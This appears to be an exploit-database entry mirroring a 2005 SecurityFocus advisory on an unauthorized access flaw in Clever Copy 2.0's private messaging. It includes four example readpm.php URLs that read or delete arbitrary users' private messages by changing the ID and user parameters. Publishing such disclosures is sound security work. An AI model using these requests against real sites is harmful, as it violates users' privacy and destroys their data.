Clever Copy 2.0 - Private Message Unauthorized Access



EKU-ID: 31373 CVE: OSVDB-18509 OSVDB-ID:
Author: Lostmon Published: 2005-07-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/14397/info

Clever Copy is affected by an unauthorized access vulnerability. This issue is due to a failure in the application to perform proper access validation checks before granting access to private message functions.

An attacker can exploit this vulnerability to delete or view arbitrary private messages of an valid user.

http://www.example.com/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass
http://www.example.com/readpm.php?op=read&ID=2&user=waltrapass

http://www.example.com/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass
http://www.example.com/readpm.php?op=del&ID=2&user=waltrapass